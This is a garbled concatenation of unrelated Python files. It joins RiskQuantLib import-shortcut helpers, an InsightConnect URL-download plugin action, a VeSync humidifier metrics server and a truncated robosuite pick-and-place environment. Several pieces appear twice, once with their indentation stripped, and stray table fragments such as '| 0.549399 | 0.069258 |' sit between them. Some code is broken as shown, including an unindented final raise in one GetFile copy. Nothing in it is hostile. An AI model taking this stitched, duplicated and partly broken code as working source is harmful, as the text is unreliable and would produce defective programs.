projectPath = os.path.abspath(__file__).split('RiskQuantLib'+os.sep+'Build'+os.sep+'buildShortcut.py')[0]
if targetProjectPath == '':
path = projectPath + os.sep + 'RiskQuantLib' + os.sep + 'Module.py'
else:
path = targetProjectPath + os.sep + 'RiskQuantLib' + os.sep + 'Module.py'
# write shortcut path
with open(path, 'r') as f:
content = f.read()
if content.find('#-<moduleImportBegin>') == -1 or content.find('#-<moduleImportEnd>') == -1:
print("Source file must have a #-<Begin> and #-<End> tag to be built")
exit(-1)
former = content.split('#-<moduleImportBegin>')[0]
ender = content.split('#-<moduleImportEnd>')[-1]
newContent = former + '#-<moduleImportBegin>\n'+psb.importLibrary+'#-<moduleImportEnd>' + ender
with open(path, 'w') as f:
f.truncate() # clear all contents
f.write(newContent.strip(' ').strip('\t\n'))
def buildShortcut(instrumentNameList:list):
"""
buildShortcut(instrumentNameList:list) is the function to generate source code of shortcut map.
It joins class name to class import path, making it easy to use instrument class.
Parameters
----------
instrumentNameList : list
The instruments whose shortcut you want to add to RiskQuantLib.module.
Returns
-------
psb : pythonScriptBuilder
A pythonScriptBuilder object contains map relation from instrument name to import path.
"""
c_instrumentNameList = [i[0].capitalize()+i[1:] for i in instrumentNameList]
psb = pythonScriptBuilder()
import RiskQuantLib.Build.pathObj as POJ
importlib.reload(POJ)
RQLpathObj = POJ.pathObj()
pathWaitedToBeAdded = [convertPathToImportPath(RQLpathObj.listPathDict[i]) for i in c_instrumentNameList]
[psb.setImport(classPath,'',True,className+'List,'+className) for classPath,className in zip(pathWaitedToBeAdded,instrumentNameList)]
    return psb
import sys,os,importlib
from RiskQuantLib.Tool.codeBuilderTool import pythonScriptBuilder
def convertPathToImportPath(pathString:str):
    """Turn a RiskQuantLib-relative file path into a dotted import path.

    Parameters
    ----------
    pathString : str
        Relative path of a RiskQuantLib file. This path must be relative
        to RiskQuantLib.__init__.py

    Returns
    -------
    str
        Dotted import path, e.g. ``RiskQuantLib.Security.Bond.bond``.
    """
    parts = pathString.split(os.sep)
    # Module name is the file name with its '.py' suffix stripped.
    moduleName = parts[-1].split('.py')[0]
    return '.'.join(['RiskQuantLib', *parts[1:-1], moduleName])
def clearShortcut(targetProjectPath:str=''):
    """Remove all instrument-class shortcuts from RiskQuantLib/Module.py.

    The auto-build inserts import shortcuts between the
    ``#-<moduleImportBegin>`` and ``#-<moduleImportEnd>`` tags; this resets
    that section to empty while leaving the generated source files on disk.

    Parameters
    ----------
    targetProjectPath : str
        The RiskQuantLib project path where you want to remove all
        instrument class shortcuts. Defaults to the project containing
        this file when empty.

    Returns
    -------
    None
    """
    projectPath = os.path.abspath(__file__).split('RiskQuantLib'+os.sep+'Build'+os.sep+'buildShortcut.py')[0]
    if targetProjectPath == '':
        path = projectPath + os.sep + 'RiskQuantLib' + os.sep + 'Module.py'
    else:
        path = targetProjectPath + os.sep + 'RiskQuantLib' + os.sep + 'Module.py'
    # Read the current module source and locate the shortcut section tags.
    with open(path, 'r') as f:
        content = f.read()
    if content.find('#-<moduleImportBegin>') == -1 or content.find('#-<moduleImportEnd>') == -1:
        print("Source file must have a #-<Begin> and #-<End> tag to be built")
        # Fix: use sys.exit instead of the site-injected builtin exit(),
        # which is not guaranteed to exist outside interactive sessions.
        sys.exit(-1)
    former = content.split('#-<moduleImportBegin>')[0]
    ender = content.split('#-<moduleImportEnd>')[-1]
    newContent = former + '#-<moduleImportBegin>\n#-<moduleImportEnd>' + ender
    # Mode 'w' already truncates on open; the explicit truncate() was redundant.
    with open(path, 'w') as f:
        f.write(newContent.strip(' ').strip('\t\n'))
def commitShortcut(psb:pythonScriptBuilder,targetProjectPath:str):
    """Write the shortcut imports held by ``psb`` into RiskQuantLib/Module.py.

    Replaces the section between the ``#-<moduleImportBegin>`` and
    ``#-<moduleImportEnd>`` tags with ``psb.importLibrary``.

    Parameters
    ----------
    psb : pythonScriptBuilder
        A pythonScriptBuilder object containing the source code of the
        shortcut map relation.
    targetProjectPath : str
        The RiskQuantLib project path where you want to commit the shortcut
        change. Defaults to the project containing this file when empty.

    Returns
    -------
    None
    """
    projectPath = os.path.abspath(__file__).split('RiskQuantLib'+os.sep+'Build'+os.sep+'buildShortcut.py')[0]
    if targetProjectPath == '':
        path = projectPath + os.sep + 'RiskQuantLib' + os.sep + 'Module.py'
    else:
        path = targetProjectPath + os.sep + 'RiskQuantLib' + os.sep + 'Module.py'
    # Read the current module source and locate the shortcut section tags.
    with open(path, 'r') as f:
        content = f.read()
    if content.find('#-<moduleImportBegin>') == -1 or content.find('#-<moduleImportEnd>') == -1:
        print("Source file must have a #-<Begin> and #-<End> tag to be built")
        # Fix: use sys.exit instead of the site-injected builtin exit(),
        # which is not guaranteed to exist outside interactive sessions.
        sys.exit(-1)
    former = content.split('#-<moduleImportBegin>')[0]
    ender = content.split('#-<moduleImportEnd>')[-1]
    newContent = former + '#-<moduleImportBegin>\n'+psb.importLibrary+'#-<moduleImportEnd>' + ender
    # Mode 'w' already truncates on open; the explicit truncate() was redundant.
    with open(path, 'w') as f:
        f.write(newContent.strip(' ').strip('\t\n'))
def buildShortcut(instrumentNameList:list):
    """Generate the shortcut import map for the given instruments.

    Joins each instrument's class name to its class import path, making the
    instrument classes easy to import through RiskQuantLib.Module.

    Parameters
    ----------
    instrumentNameList : list
        The instruments whose shortcut you want to add to RiskQuantLib.Module.

    Returns
    -------
    psb : pythonScriptBuilder
        Builder holding the map relation from instrument name to import path.
    """
    # Path registry keys are capitalized instrument names.
    c_instrumentNameList = [i[0].capitalize()+i[1:] for i in instrumentNameList]
    psb = pythonScriptBuilder()
    # Reload pathObj so newly generated files are picked up in this run.
    import RiskQuantLib.Build.pathObj as POJ
    importlib.reload(POJ)
    RQLpathObj = POJ.pathObj()
    pathWaitedToBeAdded = [convertPathToImportPath(RQLpathObj.listPathDict[i]) for i in c_instrumentNameList]
    # Fix: register the imports with a plain loop instead of a throwaway
    # list comprehension -- comprehensions should build values, not perform
    # side effects.
    for classPath, className in zip(pathWaitedToBeAdded, instrumentNameList):
        psb.setImport(classPath, '', True, className + 'List,' + className)
    return psb
import insightconnect_plugin_runtime
from insightconnect_plugin_runtime.exceptions import PluginException
from komand_get_url.util import constants
from komand_get_url.util.utils import Utils
from .schema import GetFileInput, GetFileOutput, Input, Output, Component
class GetFile(insightconnect_plugin_runtime.Action):
def __init__(self):
super(self.__class__, self).__init__(
name="get_file",
description=Component.DESCRIPTION,
input=GetFileInput(),
output=GetFileOutput(),
)
self.utils = Utils(action=self)
def run(self, params={}):
url = params.get(Input.URL)
checksum = params.get(Input.CHECKSUM)
timeout = params.get(Input.TIMEOUT, constants.DEFAULT_TIMEOUT)
is_verify = params.get(Input.IS_VERIFY, True)
user_agent = params.get(Input.USER_AGENT, constants.DEFAULT_USER_AGENT)
url_object, meta = self.utils.check_prefix_and_download(url, is_verify, user_agent, timeout)
cache_file = constants.DEFAULT_CACHE_FOLDER + meta.get("file")
if url_object:
contents = url_object.read().decode(constants.DEFAULT_ENCODING, "replace")
# Optional integrity check of file
if checksum and not insightconnect_plugin_runtime.helper.check_hashes(contents, checksum):
self.logger.error("GetFile: File Checksum Failed")
raise PluginException(
cause="Checksums between the downloaded file and provided checksum did not match.",
assistance="Verify the file you meant to download and the checksum you provided are correct.",
)
# Write etag and last modified to cache
self.utils.create_url_meta_file(meta, url_object)
# Write URL file contents to cache
self.utils.write_contents_to_cache(cache_file, contents)
# Check URL status code and return file contents
if not url_object.code or 200 <= url_object.code <= 299:
return {
Output.BYTES: insightconnect_plugin_runtime.helper.encode_string(contents).decode(
constants.DEFAULT_ENCODING
),
Output.STATUS_CODE: url_object.code or 200,
}
# When the download fails or file is not modified
else:
# Attempt to return file from cache if available
self.logger.info(f"GetURL: File not modified: {url}")
if insightconnect_plugin_runtime.helper.check_cachefile(cache_file):
self.logger.info(f"GetURL: File returned from cache: {cache_file}")
return {
Output.BYTES: insightconnect_plugin_runtime.helper.encode_file(cache_file).decode(
constants.DEFAULT_ENCODING
),
Output.STATUS_CODE: 200,
}
# If file hasn't been returned then we fail
self.logger.info(f"GetURL: Download failed for {url}")
        raise PluginException(preset=PluginException.Preset.UNKNOWN, assistance=f"Download failed for {url}")
import insightconnect_plugin_runtime
from insightconnect_plugin_runtime.exceptions import PluginException
from komand_get_url.util import constants
from komand_get_url.util.utils import Utils
from .schema import GetFileInput, GetFileOutput, Input, Output, Component
class GetFile(insightconnect_plugin_runtime.Action):
    """Plugin action that downloads a file from a URL, with optional checksum
    verification and a local cache fallback."""

    def __init__(self):
        super(self.__class__, self).__init__(
            name="get_file",
            description=Component.DESCRIPTION,
            input=GetFileInput(),
            output=GetFileOutput(),
        )
        self.utils = Utils(action=self)

    def run(self, params=None):
        """Download the file at ``Input.URL`` and return its encoded contents.

        Falls back to the cached copy when the server reports the file as
        unmodified; raises ``PluginException`` on checksum mismatch or when
        no content can be returned at all.
        """
        # Fix: mutable default argument ({}) replaced by a None sentinel so
        # the default dict is not shared across calls.
        if params is None:
            params = {}
        url = params.get(Input.URL)
        checksum = params.get(Input.CHECKSUM)
        timeout = params.get(Input.TIMEOUT, constants.DEFAULT_TIMEOUT)
        is_verify = params.get(Input.IS_VERIFY, True)
        user_agent = params.get(Input.USER_AGENT, constants.DEFAULT_USER_AGENT)
        url_object, meta = self.utils.check_prefix_and_download(url, is_verify, user_agent, timeout)
        cache_file = constants.DEFAULT_CACHE_FOLDER + meta.get("file")
        if url_object:
            contents = url_object.read().decode(constants.DEFAULT_ENCODING, "replace")
            # Optional integrity check of file
            if checksum and not insightconnect_plugin_runtime.helper.check_hashes(contents, checksum):
                self.logger.error("GetFile: File Checksum Failed")
                raise PluginException(
                    cause="Checksums between the downloaded file and provided checksum did not match.",
                    assistance="Verify the file you meant to download and the checksum you provided are correct.",
                )
            # Write etag and last modified to cache
            self.utils.create_url_meta_file(meta, url_object)
            # Write URL file contents to cache
            self.utils.write_contents_to_cache(cache_file, contents)
            # A missing/zero status code is treated as success alongside 2xx.
            if not url_object.code or 200 <= url_object.code <= 299:
                return {
                    Output.BYTES: insightconnect_plugin_runtime.helper.encode_string(contents).decode(
                        constants.DEFAULT_ENCODING
                    ),
                    Output.STATUS_CODE: url_object.code or 200,
                }
        # When the download fails or file is not modified
        else:
            # Attempt to return file from cache if available
            self.logger.info(f"GetURL: File not modified: {url}")
            if insightconnect_plugin_runtime.helper.check_cachefile(cache_file):
                self.logger.info(f"GetURL: File returned from cache: {cache_file}")
                return {
                    Output.BYTES: insightconnect_plugin_runtime.helper.encode_file(cache_file).decode(
                        constants.DEFAULT_ENCODING
                    ),
                    Output.STATUS_CODE: 200,
                }
        # If file hasn't been returned then we fail
        self.logger.info(f"GetURL: Download failed for {url}")
raise PluginException(preset=PluginException.Preset.UNKNOWN, assistance=f"Download failed for {url}") | 0.549399 | 0.069258 |
# To run this you probably need to:
# pip install pyvesync
# pip install python-dotenv
import os
import json
from http.server import BaseHTTPRequestHandler, HTTPServer
from pyvesync import VeSync
from dotenv import load_dotenv
load_dotenv()
# Setup VeSync, login, and get initial device info
vesync = VeSync(os.getenv("VESYNC_USERNAME"), os.getenv("VESYNC_PASSWORD"))
vesync.login()
vesync.update()
humidifier = json.loads(vesync.fans[0].displayJSON())
# Setup server response
class MyServer(BaseHTTPRequestHandler):
def do_GET(self):
if (self.path == "/metrics"):
vesync.update()
humidifier = json.loads(vesync.fans[0].displayJSON())
cid = humidifier["CID"]
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.end_headers()
self.wfile.write(bytes("# HELP vesync_humidity_ratio The current humidity.\n", "utf-8"))
self.wfile.write(bytes("# TYPE vesync_humidity_ratio gauge\n", "utf-8"))
self.wfile.write(bytes(f"vesync_humidity_ratio{{CID=\"{cid}\"}} {int(humidifier['Humidity']) / 100}\n", "utf-8"))
self.wfile.write(bytes("# HELP vesync_target_humidity_ratio The target humidity.\n", "utf-8"))
self.wfile.write(bytes("# TYPE vesync_target_humidity_ratio gauge\n", "utf-8"))
self.wfile.write(bytes(f"vesync_target_humidity_ratio{{CID=\"{cid}\"}} {int(humidifier['Auto Target Humidity']) / 100}\n", "utf-8"))
self.wfile.write(bytes("# HELP vesync_mist_level The current mist level.\n", "utf-8"))
self.wfile.write(bytes("# TYPE vesync_mist_level gauge\n", "utf-8"))
self.wfile.write(bytes(f"vesync_mist_level{{CID=\"{cid}\"}} {humidifier['Mist Level']}\n", "utf-8"))
self.wfile.write(bytes("# HELP vesync_mist_virtual_level The current mist virtual level.\n", "utf-8"))
self.wfile.write(bytes("# TYPE vesync_mist_virtual_level gauge\n", "utf-8"))
self.wfile.write(bytes(f"vesync_mist_virtual_level{{CID=\"{cid}\"}} {humidifier['Mist Virtual Level']}\n", "utf-8"))
self.wfile.write(bytes("# HELP vesync_night_light_brightness The night light brightness.\n", "utf-8"))
self.wfile.write(bytes("# TYPE vesync_night_light_brightness gauge\n", "utf-8"))
self.wfile.write(bytes(f"vesync_night_light_brightness{{CID=\"{cid}\"}} {humidifier['Night Light Brightness']}\n", "utf-8"))
self.wfile.write(bytes("# HELP vesync_status Device is on.\n", "utf-8"))
self.wfile.write(bytes("# TYPE vesync_status gauge\n", "utf-8"))
self.wfile.write(bytes(f"vesync_status{{CID=\"{cid}\"}} {1 if humidifier['Status'] == 'on' else 0}\n", "utf-8"))
self.wfile.write(bytes("# HELP vesync_online Device is online.\n", "utf-8"))
self.wfile.write(bytes("# TYPE vesync_online gauge\n", "utf-8"))
self.wfile.write(bytes(f"vesync_online{{CID=\"{cid}\"}} {1 if humidifier['Online'] == 'online' else 0}\n", "utf-8"))
self.wfile.write(bytes("# HELP vesync_mode_auto Auto mode enabled.\n", "utf-8"))
self.wfile.write(bytes("# TYPE vesync_mode_auto gauge\n", "utf-8"))
self.wfile.write(bytes(f"vesync_mode_auto{{CID=\"{cid}\"}} {1 if humidifier['Mode'] == 'auto' else 0}\n", "utf-8"))
self.wfile.write(bytes("# HELP vesync_water_lacks Water level low.\n", "utf-8"))
self.wfile.write(bytes("# TYPE vesync_water_lacks gauge\n", "utf-8"))
self.wfile.write(bytes(f"vesync_water_lacks{{CID=\"{cid}\"}} {1 if humidifier['Water Lacks'] == True else 0}\n", "utf-8"))
self.wfile.write(bytes("# HELP vesync_humidity_high Humidity too high.\n", "utf-8"))
self.wfile.write(bytes("# TYPE vesync_humidity_high gauge\n", "utf-8"))
self.wfile.write(bytes(f"vesync_humidity_high{{CID=\"{cid}\"}} {1 if humidifier['Humidity High'] == True else 0}\n", "utf-8"))
self.wfile.write(bytes("# HELP vesync_water_tank_lifted Water tank missing.\n", "utf-8"))
self.wfile.write(bytes("# TYPE vesync_water_tank_lifted gauge\n", "utf-8"))
self.wfile.write(bytes(f"vesync_water_tank_lifted{{CID=\"{cid}\"}} {1 if humidifier['Water Tank Lifted'] == True else 0}\n", "utf-8"))
self.wfile.write(bytes("# HELP vesync_display_enabled Display is enabled.\n", "utf-8"))
self.wfile.write(bytes("# TYPE vesync_display_enabled gauge\n", "utf-8"))
self.wfile.write(bytes(f"vesync_display_enabled{{CID=\"{cid}\"}} {1 if humidifier['Display'] == True else 0}\n", "utf-8"))
self.wfile.write(bytes("# HELP vesync_automatic_stop_reach_target Automatic stop reach target?\n", "utf-8"))
self.wfile.write(bytes("# TYPE vesync_automatic_stop_reach_target gauge\n", "utf-8"))
self.wfile.write(bytes(f"vesync_automatic_stop_reach_target{{CID=\"{cid}\"}} {1 if humidifier['Automatic Stop Reach Target'] == True else 0}\n", "utf-8"))
self.wfile.write(bytes("# HELP vesync_automatic_stop Automatic stop?\n", "utf-8"))
self.wfile.write(bytes("# TYPE vesync_automatic_stop gauge\n", "utf-8"))
self.wfile.write(bytes(f"vesync_automatic_stop{{CID=\"{cid}\"}} {1 if humidifier['Automatic Stop'] == True else 0}\n", "utf-8"))
else:
self.send_response(501)
self.send_header("Content-type", "text/plain")
self.end_headers()
self.wfile.write(bytes("501 Not Implemented", "utf-8"))
# Start server
server = HTTPServer((os.getenv("HOSTNAME"), int(os.getenv("PORT"))), MyServer)
print("Server started http://%s:%s" % (os.getenv("HOSTNAME"), os.getenv("PORT")))
try:
server.serve_forever()
except KeyboardInterrupt:
pass
server.server_close()
print("Server stopped.") | pro-ve-pro.py |
# To run this you probably need to:
# pip install pyvesync
# pip install python-dotenv
import os
import json
from http.server import BaseHTTPRequestHandler, HTTPServer
from pyvesync import VeSync
from dotenv import load_dotenv
load_dotenv()
# Setup VeSync, login, and get initial device info
vesync = VeSync(os.getenv("VESYNC_USERNAME"), os.getenv("VESYNC_PASSWORD"))
vesync.login()
vesync.update()
humidifier = json.loads(vesync.fans[0].displayJSON())
# Setup server response
class MyServer(BaseHTTPRequestHandler):
def do_GET(self):
if (self.path == "/metrics"):
vesync.update()
humidifier = json.loads(vesync.fans[0].displayJSON())
cid = humidifier["CID"]
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.end_headers()
self.wfile.write(bytes("# HELP vesync_humidity_ratio The current humidity.\n", "utf-8"))
self.wfile.write(bytes("# TYPE vesync_humidity_ratio gauge\n", "utf-8"))
self.wfile.write(bytes(f"vesync_humidity_ratio{{CID=\"{cid}\"}} {int(humidifier['Humidity']) / 100}\n", "utf-8"))
self.wfile.write(bytes("# HELP vesync_target_humidity_ratio The target humidity.\n", "utf-8"))
self.wfile.write(bytes("# TYPE vesync_target_humidity_ratio gauge\n", "utf-8"))
self.wfile.write(bytes(f"vesync_target_humidity_ratio{{CID=\"{cid}\"}} {int(humidifier['Auto Target Humidity']) / 100}\n", "utf-8"))
self.wfile.write(bytes("# HELP vesync_mist_level The current mist level.\n", "utf-8"))
self.wfile.write(bytes("# TYPE vesync_mist_level gauge\n", "utf-8"))
self.wfile.write(bytes(f"vesync_mist_level{{CID=\"{cid}\"}} {humidifier['Mist Level']}\n", "utf-8"))
self.wfile.write(bytes("# HELP vesync_mist_virtual_level The current mist virtual level.\n", "utf-8"))
self.wfile.write(bytes("# TYPE vesync_mist_virtual_level gauge\n", "utf-8"))
self.wfile.write(bytes(f"vesync_mist_virtual_level{{CID=\"{cid}\"}} {humidifier['Mist Virtual Level']}\n", "utf-8"))
self.wfile.write(bytes("# HELP vesync_night_light_brightness The night light brightness.\n", "utf-8"))
self.wfile.write(bytes("# TYPE vesync_night_light_brightness gauge\n", "utf-8"))
self.wfile.write(bytes(f"vesync_night_light_brightness{{CID=\"{cid}\"}} {humidifier['Night Light Brightness']}\n", "utf-8"))
self.wfile.write(bytes("# HELP vesync_status Device is on.\n", "utf-8"))
self.wfile.write(bytes("# TYPE vesync_status gauge\n", "utf-8"))
self.wfile.write(bytes(f"vesync_status{{CID=\"{cid}\"}} {1 if humidifier['Status'] == 'on' else 0}\n", "utf-8"))
self.wfile.write(bytes("# HELP vesync_online Device is online.\n", "utf-8"))
self.wfile.write(bytes("# TYPE vesync_online gauge\n", "utf-8"))
self.wfile.write(bytes(f"vesync_online{{CID=\"{cid}\"}} {1 if humidifier['Online'] == 'online' else 0}\n", "utf-8"))
self.wfile.write(bytes("# HELP vesync_mode_auto Auto mode enabled.\n", "utf-8"))
self.wfile.write(bytes("# TYPE vesync_mode_auto gauge\n", "utf-8"))
self.wfile.write(bytes(f"vesync_mode_auto{{CID=\"{cid}\"}} {1 if humidifier['Mode'] == 'auto' else 0}\n", "utf-8"))
self.wfile.write(bytes("# HELP vesync_water_lacks Water level low.\n", "utf-8"))
self.wfile.write(bytes("# TYPE vesync_water_lacks gauge\n", "utf-8"))
self.wfile.write(bytes(f"vesync_water_lacks{{CID=\"{cid}\"}} {1 if humidifier['Water Lacks'] == True else 0}\n", "utf-8"))
self.wfile.write(bytes("# HELP vesync_humidity_high Humidity too high.\n", "utf-8"))
self.wfile.write(bytes("# TYPE vesync_humidity_high gauge\n", "utf-8"))
self.wfile.write(bytes(f"vesync_humidity_high{{CID=\"{cid}\"}} {1 if humidifier['Humidity High'] == True else 0}\n", "utf-8"))
self.wfile.write(bytes("# HELP vesync_water_tank_lifted Water tank missing.\n", "utf-8"))
self.wfile.write(bytes("# TYPE vesync_water_tank_lifted gauge\n", "utf-8"))
self.wfile.write(bytes(f"vesync_water_tank_lifted{{CID=\"{cid}\"}} {1 if humidifier['Water Tank Lifted'] == True else 0}\n", "utf-8"))
self.wfile.write(bytes("# HELP vesync_display_enabled Display is enabled.\n", "utf-8"))
self.wfile.write(bytes("# TYPE vesync_display_enabled gauge\n", "utf-8"))
self.wfile.write(bytes(f"vesync_display_enabled{{CID=\"{cid}\"}} {1 if humidifier['Display'] == True else 0}\n", "utf-8"))
self.wfile.write(bytes("# HELP vesync_automatic_stop_reach_target Automatic stop reach target?\n", "utf-8"))
self.wfile.write(bytes("# TYPE vesync_automatic_stop_reach_target gauge\n", "utf-8"))
self.wfile.write(bytes(f"vesync_automatic_stop_reach_target{{CID=\"{cid}\"}} {1 if humidifier['Automatic Stop Reach Target'] == True else 0}\n", "utf-8"))
self.wfile.write(bytes("# HELP vesync_automatic_stop Automatic stop?\n", "utf-8"))
self.wfile.write(bytes("# TYPE vesync_automatic_stop gauge\n", "utf-8"))
self.wfile.write(bytes(f"vesync_automatic_stop{{CID=\"{cid}\"}} {1 if humidifier['Automatic Stop'] == True else 0}\n", "utf-8"))
else:
self.send_response(501)
self.send_header("Content-type", "text/plain")
self.end_headers()
self.wfile.write(bytes("501 Not Implemented", "utf-8"))
# Start server
server = HTTPServer((os.getenv("HOSTNAME"), int(os.getenv("PORT"))), MyServer)
print("Server started http://%s:%s" % (os.getenv("HOSTNAME"), os.getenv("PORT")))
try:
server.serve_forever()
except KeyboardInterrupt:
pass
server.server_close()
print("Server stopped.") | 0.276397 | 0.051942 |
import numpy as np
from composition.arenas.pick_place_arena import PickPlaceArena
from composition.env.compositional_env import CompositionalEnv
from composition.tasks.task_utils import dot_product_angle
import robosuite.utils.transform_utils as T
from robosuite.utils.placement_samplers import UniformRandomSampler
class PickPlaceSubtask(CompositionalEnv):
"""
This class corresponds to the pick place task for a single robot arm.
Args:
bin1_pos (3-tuple): Absolute cartesian coordinates of the bin initially holding the objects
bin2_pos (3-tuple): Absolute cartesian coordinates of the goal bin
use_object_obs (bool): if True, include object (cube) information in
the observation.
reward_scale (None or float): Scales the normalized reward function by the amount specified.
If None, environment reward remains unnormalized
reward_shaping (bool): if True, use dense rewards.
object_type (string): if provided, should be one of "milk", "bread", "cereal",
or "can". Determines which type of object will be spawned on every
environment reset. Only used if @single_object_mode is 2.
Raises:
AssertionError: [Invalid object type specified]
AssertionError: [Invalid number of robots specified]
"""
def __init__(
self,
robots,
object_type,
obstacle,
env_configuration="default",
controller_configs=None,
mount_types="default",
gripper_types="RethinkGripper",
initialization_noise=None,
use_camera_obs=True,
use_object_obs=True,
use_task_id_obs=False,
has_renderer=False,
has_offscreen_renderer=True,
render_camera="frontview",
render_collision_mesh=False,
render_visual_mesh=True,
render_gpu_device_id=-1,
control_freq=20,
horizon=1000,
ignore_done=False,
hard_reset=True,
camera_names="agentview",
camera_heights=256,
camera_widths=256,
camera_depths=False,
bin1_pos=(0.1, -0.26, 0.8),
bin2_pos=(0.1, 0.13, 0.8),
reward_scale=1.0,
reward_shaping=False,
):
self.subtask_id = 0
super().__init__(
robots,
object_type,
obstacle,
bin1_pos,
bin2_pos,
env_configuration=env_configuration,
controller_configs=controller_configs,
mount_types=mount_types,
gripper_types=gripper_types,
initialization_noise=initialization_noise,
use_camera_obs=use_camera_obs,
use_object_obs=use_object_obs,
use_task_id_obs=use_task_id_obs,
has_renderer=has_renderer,
has_offscreen_renderer=has_offscreen_renderer,
render_camera=render_camera,
render_collision_mesh=render_collision_mesh,
render_visual_mesh=render_visual_mesh,
render_gpu_device_id=render_gpu_device_id,
control_freq=control_freq,
horizon=horizon,
ignore_done=ignore_done,
hard_reset=hard_reset,
camera_names=camera_names,
camera_heights=camera_heights,
camera_widths=camera_widths,
camera_depths=camera_depths,
reward_scale=reward_scale,
reward_shaping=reward_shaping,
)
self.was_grasping = False
self.dropped_object = False
def staged_rewards(self, action):
"""
Returns staged rewards based on current physical states.
Stages consist of reaching, grasping, lifting, and hovering.
Returns:
4-tuple:
- (float) reaching reward
- (float) grasping reward
- (float) lifting reward
- (float) hovering reward
"""
reach_mult = 0.2
grasp_mult = 0.3
lift_mult = 0.5
hover_mult = 0.7
drop_mult = 0.9
r_align = 0
# reaching reward governed by distance to closest object
r_reach = 0.
if not self.object_in_bin:
# get reaching reward via minimum distance to a target object
dist = self._gripper_to_target(
gripper=self.robots[0].gripper,
target=self.object.root_body,
target_type="body",
return_distance=True,
)
r_reach = (1 - np.tanh(10.0 * dist)) * reach_mult
# grasping reward for touching any objects of interest
is_grasping = self._check_grasp(
gripper=self.robots[0].gripper,
object_geoms=[g for g in self.object.contact_geoms])
r_grasp = int(is_grasping) * grasp_mult
# lifting reward for picking up an object
r_lift = 0.
if not self.object_in_bin and r_grasp > 0.:
z_target = self.bin2_pos[2] + 0.25
object_z_loc = self.sim.data.body_xpos[self.obj_body_id, 2]
z_dist = np.abs(z_target - object_z_loc)
r_lift = grasp_mult + (1 - np.tanh(5.0 * z_dist)) * (
lift_mult - grasp_mult
)
# segment objects into left of the bins and above the bins
object_xy_loc = self.sim.data.body_xpos[self.obj_body_id, :2]
y_check = (
np.abs(object_xy_loc[1] -
self.bin2_pos[1])
< self.bin2_size[1]
)
x_check = (
np.abs(object_xy_loc[0] -
self.bin2_pos[0])
< self.bin2_size[0]
)
object_above_bin = x_check and y_check
# hover reward for getting object above bin
r_hover = 0.
r_drop = 0.
if not self.object_in_bin and r_lift > 0.45:
dist = np.linalg.norm(
self.bin2_pos[:2] - object_xy_loc
)
# objects to the left get r_lift added to hover reward,
# those on the right get max(r_lift) added (to encourage dropping)
if not object_above_bin:
r_hover = r_lift + (
1 - np.tanh(2.0 * dist)
) * (hover_mult - lift_mult)
else:
r_hover = lift_mult + (
1 - np.tanh(2.0 * dist)
) * (hover_mult - lift_mult)
if r_grasp > 0 and object_above_bin:
z_target = self.bin2_pos[2] + 0.1
object_z_loc = self.sim.data.body_xpos[self.obj_body_id, 2]
z_dist = np.maximum(object_z_loc - z_target, 0.)
r_drop = hover_mult + \
(1 - np.tanh(5.0 * z_dist)) * (drop_mult - hover_mult)
# print('is_grasping:', is_grasping, 'was_grasping:', self.was_grasping, 'gripper_pos:', self.sim.data.site_xpos[self.robots[0].eef_site_id, 2], 'target_h:', self.bin2_pos[2] + 0.1 )
# TODO: this height is arbitrary and won't work for eg milk and cereal
if (not is_grasping) and self.was_grasping and self.sim.data.site_xpos[self.robots[0].eef_site_id, 2] > self.bin2_pos[2] + 0.1:
self.dropped_object = True
self.was_grasping = is_grasping
return r_align, r_reach, r_grasp, r_lift, r_hover, r_drop
def not_in_bin(self, obj_pos):
bin_x_low = self.bin2_pos[0] - self.bin2_size[0]
bin_y_low = self.bin2_pos[1] - self.bin2_size[1]
bin_x_high = self.bin2_pos[0] + self.bin2_size[0]
bin_y_high = self.bin2_pos[1] + self.bin2_size[1]
res = True
if (
bin_x_low < obj_pos[0] < bin_x_high
and bin_y_low < obj_pos[1] < bin_y_high
and self.bin2_pos[2] < obj_pos[2] < self.bin2_pos[2] + 0.1
):
res = False
return res
def _get_placement_initializer(self):
"""
Helper function for defining placement initializer and object sampling bounds.
"""
super()._get_placement_initializer()
bin_x_low = -self.bin2_size[0] / 2
bin_y_low = -self.bin2_size[1] / 2
bin_x_high = self.bin2_size[0] / 2
bin_y_high = self.bin2_size[1] / 2
# TODO: why is this not exactly in the middle
self.placement_initializer.append_sampler(
sampler=UniformRandomSampler(
name=f"{self.visual_object.name}ObjectSampler",
mujoco_objects=self.visual_object,
x_range=[bin_x_low, bin_x_high],
y_range=[bin_y_low, bin_y_high],
rotation=0.,
rotation_axis='z',
ensure_object_boundary_in_range=False,
ensure_valid_placement=False,
reference_pos=self.bin2_pos,
z_offset=self.bin2_pos[2] - self.bin1_pos[2],
)
)
def _load_model(self):
"""
Loads an xml model, puts it in self.model
"""
# load model for table top workspace
self.mujoco_arena = PickPlaceArena(
bin1_pos=self.bin1_pos,
)
# Load model propagation
super()._load_model()
# Generate placement initializer
self._initialize_model()
self._get_placement_initializer()
def _setup_references(self):
"""
Sets up references to important components. A reference is typically an
index or a list of indices that point to the corresponding elements
in a flatten array, which is how MuJoCo stores physical simulation data.
"""
# keep track of which objects are in their corresponding bins
self.object_in_bin = False
# target locations in bin for each object type
self.target_bin_placements = np.zeros((1, 3))
# TODO: fix this once i understand why its here
# I think we can remove target bin placements
bin_x_low = self.bin2_pos[0]
bin_y_low = self.bin2_pos[1]
bin_x_low += self.bin2_size[0] / 2.
bin_y_low += self.bin2_size[1] / 2.
self.target_bin_placements[0, :] = [
bin_x_low, bin_y_low, self.bin2_pos[2]]
super()._setup_references()
def _reset_internal(self):
"""
Resets simulation internal configurations.
"""
super()._reset_internal()
self.was_grasping = False
# Set the bins to the desired position
self.sim.model.body_pos[self.sim.model.body_name2id(
"bin1")] = self.bin1_pos
self.sim.model.body_pos[self.sim.model.body_name2id(
"bin2")] = self.bin2_pos
def _check_success(self):
"""
Check if all objects have been successfully placed in their corresponding bins.
Returns:
bool: True if object is placed correctly
"""
# remember objects that are in the correct bins
gripper_site_pos = self.sim.data.site_xpos[self.robots[0].eef_site_id]
obj_pos = self.sim.data.body_xpos[self.obj_body_id]
dist = np.linalg.norm(gripper_site_pos - obj_pos)
r_reach = 1 - np.tanh(10.0 * dist)
# self.object_in_bin = not self.not_in_bin(obj_pos)
self.object_in_bin = bool(
(not self.not_in_bin(obj_pos)) and r_reach > 0.35)
return self.object_in_bin
def _post_action(self, action):
"""
Do any housekeeping after taking an action.
Args:
action (np.array): Action to execute within the environment
Returns:
3-tuple:
